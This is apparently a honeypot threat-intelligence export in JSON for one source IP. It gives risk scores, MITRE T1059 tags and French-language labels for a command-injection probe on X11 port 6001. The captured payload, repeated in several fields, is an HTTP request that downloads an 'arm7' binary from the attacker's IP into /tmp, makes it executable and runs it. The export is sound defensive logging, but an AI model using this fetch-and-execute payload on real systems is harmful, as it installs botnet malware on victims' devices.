{"ip":"94.154.43.57","exported_at":"2026-07-18T12:20:55+00:00","period_days":7,"metrics":{"events7d":0,"distinct_ports":0,"distinct_classifications":0,"max_severity":null,"last_sensor_id":"paris-1","max_waf_score":null,"max_risk_score":54,"attack_stage":"exploit_attempt","attack_chain_stage":"exploitation","threat_family":["rce_probe"],"recommended_action":"investigate","confidence":1,"risk_breakdown":{"waf":8,"classification":85,"behavior":0,"geo":0,"protocol":22,"novelty":15},"mitre_tactics":["TA0001","TA0002"],"mitre_technique":"T1059","top_mitre_technique":"T1059","top_mitre_count":1,"executive_one_liner_fr":"Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via X11","campaign_hint_fr":null,"confidence_breakdown":{"waf":8,"classification":85,"behavior":0,"geo":0,"protocol":22,"novelty":15,"risk_score":54},"persona_hostname":"mail.sensor-1.internal","correlation_flags":[],"correlation_flags_labels_fr":[],"confidence_pct":100,"confidence_hint_fr":null,"sensor_role_label_fr":"Renseignement menaces","tags_summary_labels_fr":["MITRE-T1059","pat-0773","pat-0144","pat-0145"],"tags_summary":["MITRE-T1059","pat-0773","pat-0144","pat-0145"],"attack_vector":"cmd injection \u00b7 via X11:6001 \u00b7 (tentative d\u0027exploit)","protocol_details":{"payload_preview":"GET \/shell?cd+\/tmp;rm+arm+arm7;wget+http:\/\\\/94.154.43.57\/arm7;chmod+777+arm7;.\/arm7 HTTP\/1.1\r\nHost: 62.3.50.33:6001\r\nConnection:","port":6001,"service":"x11","service_label_fr":"X11"},"protocol_summary_fr":"Payload GET \/shell?cd+\/tmp;rm+arm+arm7;wget+http:\/\\\/94.154.43.57\/arm7;c\u2026 \u00b7 X11:6001","evidence_snippet":"GET \/shell?cd+\/tmp;rm+arm+arm7;wget+http:\/\\\/94.154.43.57\/arm7;chmod+777+arm7;.\/arm7 HTTP\/1.1\r\nHost: 62.3.50.33:6001\r\nConnection:","target_port_label":"6001 \u00b7 X11","emulator_service":"x11","confidence_reason":"Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9","classification_reason":"Type \u00ab cmd_injection \u00bb (signaux protocolaires) \u00b7 confiance 100%","classification_reason_label_fr":"Type \u00ab cmd_injection \u00bb (signaux protocolaires) \u00b7 confiance 100%","confidence_factors_fr":"Confiance 100 % \u2014 Score WAF 8","payload_preview":"GET \/shell?cd+\/tmp;rm+arm+arm7;wget+http:\/\\\/94.154.43.57\/arm7;chmod+777+arm7;.\/arm7 HTTP\/1.1\r\nHost: 62.3.50.33:6001\r\nConnection:"},"events":[],"total_events":0}